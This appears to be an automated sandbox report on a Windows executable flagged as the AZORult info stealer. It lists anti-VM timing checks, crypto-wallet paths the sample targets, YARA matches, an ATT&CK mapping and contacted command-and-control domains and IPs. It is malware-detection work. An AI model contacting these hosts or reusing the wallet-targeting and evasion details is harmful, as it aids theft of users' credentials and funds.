Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040C9EA push 0040CA18h; ret	0_2_0040CA10
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040C9EC push 0040CA18h; ret	0_2_0040CA10
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040E1A4 push 0040E1D0h; ret	0_2_0040E1C8
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040B1B8 push 0040B1E4h; ret	0_2_0040B1DC
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040E25A push 0040E288h; ret	0_2_0040E280
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040E25C push 0040E288h; ret	0_2_0040E280
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00414A28 push 00414A84h; ret	0_2_00414A7C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040BAB8 push 0040BAE4h; ret	0_2_0040BADC
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00409B54 push 00409BC8h; ret	0_2_00409BC0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00409B78 push 00409BC8h; ret	0_2_00409BC0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040D378 push 0040D3A8h; ret	0_2_0040D3A0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040D37C push 0040D3A8h; ret	0_2_0040D3A0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00413B7C push 00413BA8h; ret	0_2_00413BA0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040B3D8 push 0040B414h; ret	0_2_0040B40C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040B3DC push 0040B414h; ret	0_2_0040B40C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004183E4 push 00418410h; ret	0_2_00418408
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040BBEC push 0040BC18h; ret	0_2_0040BC10
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00409B90 push 00409BC8h; ret	0_2_00409BC0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00413C10 push 00413C3Ch; ret	0_2_00413C34
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00404C1C push 00404C6Dh; ret	0_2_00404C65
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0040B420 push 0040B44Ch; ret	0_2_0040B444

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Code function: 0_2_00417216 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

0_2_00417216

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

0_2_00417216

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	RDTSC instruction interceptor: First address: 00000000021222C8 second address: 00000000021222CC instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	RDTSC instruction interceptor: First address: 00000000021222CC second address: 00000000021222CC instructions: 0x00000000 rdtsc 0x00000002 sub eax, edx 0x00000004 jnbe 00007FBD94B9982Ch 0x00000006 rdtsc

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Code function: 0_2_00415E40 GetSystemInfo,

0_2_00415E40

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00413030 FindFirstFileW,FindNextFileW,FindClose,	0_2_00413030
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004119A8 FindFirstFileW,FindNextFileW,FindClose,	0_2_004119A8
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004119AC FindFirstFileW,FindNextFileW,FindClose,	0_2_004119AC
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00412D6C FindFirstFileW,FindNextFileW,FindClose,	0_2_00412D6C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0041160C FindFirstFileW,FindNextFileW,FindClose,	0_2_0041160C
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	0_2_00413F58
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	0_2_00413F58

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW@

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00407AF0 mov eax, dword ptr fs:[00000030h]	0_2_00407AF0
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_0046052B mov ebx, dword ptr fs:[00000030h]	0_2_0046052B
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00460000 mov eax, dword ptr fs:[00000030h]	0_2_00460000
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00460000 mov ebx, dword ptr fs:[00000030h]	0_2_00460000
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_00460AFD mov eax, dword ptr fs:[00000030h]	0_2_00460AFD
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004606F5 mov eax, dword ptr fs:[00000030h]	0_2_004606F5
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004606F5 mov ecx, dword ptr fs:[00000030h]	0_2_004606F5
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004A0000 mov eax, dword ptr fs:[00000030h]	0_2_004A0000
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004A0000 mov ecx, dword ptr fs:[00000030h]	0_2_004A0000
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004A0408 mov eax, dword ptr fs:[00000030h]	0_2_004A0408

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

0_2_00417216

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Code function: GetLocaleInfoA,

0_2_00404BA8

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Code function: 0_2_00404C71 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,

0_2_00404C71

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe

Code function: 0_2_004065F0 GetUserNameW,

0_2_004065F0

Stealing of Sensitive Information:

Yara detected Azorult

Show sources

Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY

Detected AZORult Info Stealer

Show sources

Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004186C4		0_2_004186C4
Source: C:\Users\user\Desktop\2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	Code function: 0_2_004186C4		0_2_004186C4

Yara detected Azorult Info Stealer

Show sources

Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.544424238.0000000000480000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.544452351.00000000004B0000.00000004.00000001.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: electrum.dat
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %appdata%\Electrum\wallets\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %APPDATA%\Exodus\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %APPDATA%\Exodus\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: 2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	String found in binary or memory: %appdata%\Electrum-LTC\wallets\

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	Input Capture1	Security Software Discovery11	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Obfuscated Files or Information2	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing1	Security Account Manager	System Owner/User Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol113	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery114	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	69%	Virustotal		Browse
2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	75%	ReversingLabs	Win32.Infostealer.Coins
2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	100%	Avira	HEUR/AGEN.1125422
2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1108767	Download File
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.480000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.4b0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1125422	Download File

Domains

Source	Detection	Scanner	Link
admin.svapofit.com	9%	Virustotal	Browse
survey-smiles.com	8%	Virustotal	Browse
ww1.survey-smiles.com	9%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://ww1.survey-smiles.com/%	100%	Avira URL Cloud	phishing
http://ww1.survey-smiles.com/e	100%	Avira URL Cloud	phishing
http://admin.svapofit.=	0%	Avira URL Cloud	safe
http://admin.svapofit.com/azs/index.php8	0%	Avira URL Cloud	safe
http://survey-smiles.com/=	0%	Avira URL Cloud	safe
http://survey-smiles.com/csvc	0%	Avira URL Cloud	safe
http://survey-smiles.com/	0%	Avira URL Cloud	safe
http://admin.svapofit.com/azs/index.phpSb	0%	Avira URL Cloud	safe
https://dotbit.me/a/	0%	URL Reputation	safe
http://admin.svapofit.com/	0%	Avira URL Cloud	safe
http://ww1.survey-smiles.com/z	100%	Avira URL Cloud	phishing
http://admin.svapofit.com/azs/index.php	0%	Avira URL Cloud	safe
http://ww1.survey-smiles.com/sof	100%	Avira URL Cloud	phishing
http://ww1.survey-smiles.com/	100%	Avira URL Cloud	phishing
http://survey-smiles.c-k	0%	Avira URL Cloud	safe
http://survey-smiles.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
admin.svapofit.com	63.141.242.43	true	true	9%, Virustotal, Browse	unknown
survey-smiles.com	5.79.68.108	true	false	8%, Virustotal, Browse	unknown
12065.BODIS.com	199.59.242.153	true	false		high
ww1.survey-smiles.com	unknown	unknown	false	9%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://survey-smiles.com/	false	Avira URL Cloud: safe	unknown
http://admin.svapofit.com/azs/index.php	true	Avira URL Cloud: safe	unknown
http://ww1.survey-smiles.com/	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ww1.survey-smiles.com/%	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp	true	Avira URL Cloud: phishing	unknown
http://ww1.survey-smiles.com/e	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	true	Avira URL Cloud: phishing	unknown
http://admin.svapofit.=	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	low
http://admin.svapofit.com/azs/index.php8	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://survey-smiles.com/=	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://survey-smiles.com/csvc	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.icq.com/legal/eula/en	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	false		high
http://admin.svapofit.com/azs/index.phpSb	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://ip-api.com/json	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	false		high
https://dotbit.me/a/	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	false	URL Reputation: safe	unknown
http://www.icq.com/legal/privacypolicy/en	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe	false		high
http://admin.svapofit.com/	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://ww1.survey-smiles.com/z	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544600574.000000000075D000.00000004.00000020.sdmp	true	Avira URL Cloud: phishing	unknown
http://ww1.survey-smiles.com/sof	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544588869.0000000000754000.00000004.00000020.sdmp	true	Avira URL Cloud: phishing	unknown
http://survey-smiles.c-k	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000002.544548107.0000000000719000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://survey-smiles.com	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe, 00000000.00000003.543285229.000000000075E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
5.79.68.108	survey-smiles.com	Netherlands	60781	LEASEWEB-NL-AMS-01NetherlandsNL	false
199.59.242.153	12065.BODIS.com	United States	395082	BODIS-NJUS	false
63.141.242.43	admin.svapofit.com	United States	33387	NOCIXUS	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	491841
Start date:	28.09.2021
Start time:	00:48:25
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 96.5% (good quality ratio 93.2%) Quality average: 79.5% Quality standard deviation: 28.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.209.183, 20.54.110.249, 40.112.88.60, 93.184.221.240, 20.199.120.85, 80.67.82.235, 80.67.82.211, 20.50.102.62, 20.199.120.151, 20.199.120.182 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
5.79.68.108	o8fQ05Cc29.exe	Get hash	malicious	Browse	survey-smiles.com/
	ZIPEXT#U007e1.EXE	Get hash	malicious	Browse	survey-smiles.com/
	es.likisoft.farmalicante.apk	Get hash	malicious	Browse	ad.leadboltads.net/show_app_ad.js?section_id=924902828
199.59.242.153	RFQ_Beijing Chengruisi Manufacturing_pdf.exe	Get hash	malicious	Browse	www.anodynemedicalmassage.com/euzn/?G0Ddo=u178RPbEoFHNEMSTYSAKyFLEc68kuAf3hAv/2v3T+vkoQ4nsSSLkzGkhPsJYzpfotw78F7bWTQ==&2dod=HL3Tzluhwhvxcp
	SQLPLUS.EXE	Get hash	malicious	Browse	ww1.weirden.com/
	TNT 07833955.exe	Get hash	malicious	Browse	www.tenncreative.com/b5ce/?C2M=Rg3TsdfntIiWJKNWRmLTqgm5mB7Gwns4ujDsoW9GSorZA7LMeCjIS06nAIZUc2zUa+VgrpSNrw==&2dtd=2dTpyPZX3Tqt_8d0
	LogJhhPPyK.exe	Get hash	malicious	Browse	www.mammutphilippines.com/n90q/?-ZYT=GiWrvS/99XrV+2Uf6Zy/o5YW6c6VukN0OHlBSCCHHBiFQpS9xb5cjKCaQXfJL9Q9t00b&IZsH=3fjpWpD0JdD
	PO.exe	Get hash	malicious	Browse	www.rejddit.com/ig04/?0DH8qx3=3h/Tr838qcHUz18OOMqR99bs8cT2OrpSq2e3FqStS3xcK7WNKLX9gCPVSXRmyxeIco6krjPjWg==&jL3=-ZrdqHw
	D1B9D1321F517D78BC0D1D03C5ED3C20A1CCB85BF755B.exe	Get hash	malicious	Browse	ww4.onlygoodman.com/
	pay.exe	Get hash	malicious	Browse	www.salartfinance.com/t75f/?V6yLxzHh=lAZRvM4hLFtTWseMMjmTcl+RZcUPNrURFXAml9hw9i0ZHFoSyWAXJ/sXcd8B+Vv3Doaf&bX=AdotnVi0RxtDfRqP
	DOC.exe	Get hash	malicious	Browse	www.camham.co.uk/imm8/?oZBd28E8=JSfa42tBaq4a3YeMfphPE2TCUHWdSJf7Yy7nyCnDPKehtAvkSRQbSxaf+1hgIsLr6SVj&7n6hj=p2MtFfu8w4Y
	RFQ.Order 0128-44.exe	Get hash	malicious	Browse	www.glatt.store/5afm/?0FQ0vvt=JMGrtXIs8RtMHth06d94tZTj42tDCsOeVWPwlq/2m+LWjBoF9Wmh8X/iRtktzTq0TwDw&nP=PtUdq8l
	PAYMENT ADVICE.exe	Get hash	malicious	Browse	www.wwwrigalinks.com/bp39/?kd3=7nx4e8sXT&6lTp=toZvbJQL0cTYgDF5OxAGAk7QJRoDVvuNfvSwYwfcNspP7qp4L1Koj5ofZh66BEpk6+Ro
	rex for fs2004__3039_i1291358365_il1363251.exe	Get hash	malicious	Browse	ww1.survey-smiles.com/js/parking.2.69.0.js
	BIN.exe	Get hash	malicious	Browse	www.hauhome.club/n8ba/?I6El7rEX=NUeE9ayc3PySnAVgNXjn0BYB7KGsqh3j5qPQnKWJKMOSIWaR3h7kqTPRULqYbfwLMKP6&yBZ02=2df8xb-H6hatkZkp
	U8mrImRa5n.exe	Get hash	malicious	Browse	www.wwwmacsports.com/nff/?HL3Hu4=m9tMrdH5s5McIQQpiSGs8SInYxUL4H2IAxrYgc1ZIVpX4WbHn5hGWqowwYX2QoAzIcixb1jveg==&b81db=s8SLRRP8
	purchase order No. 00109877 pdf.exe	Get hash	malicious	Browse	www.prepping.store/h388/?S6AhC6=sxj1nv4tRLo8fEEpX4virXwU1x6V8LUDbA8wvNc6PvsTc+vNjCclbHTjPwwtuSYEUDyy&SjQ=Hd3Xox1hjJcpd2
	XTRA POWER SOLAR PRODUCTS - OFF GRID 2021-8-23.xlsx	Get hash	malicious	Browse	www.hauhome.club/n8ba/?C2=krEH&P88pddj=NUeE9ayZ3IyWnQZsPXjn0BYB7KGsqh3j5qXA7JKIOsOTIn2Xwxqo8X3TXuGOfP04HJSKyQ==
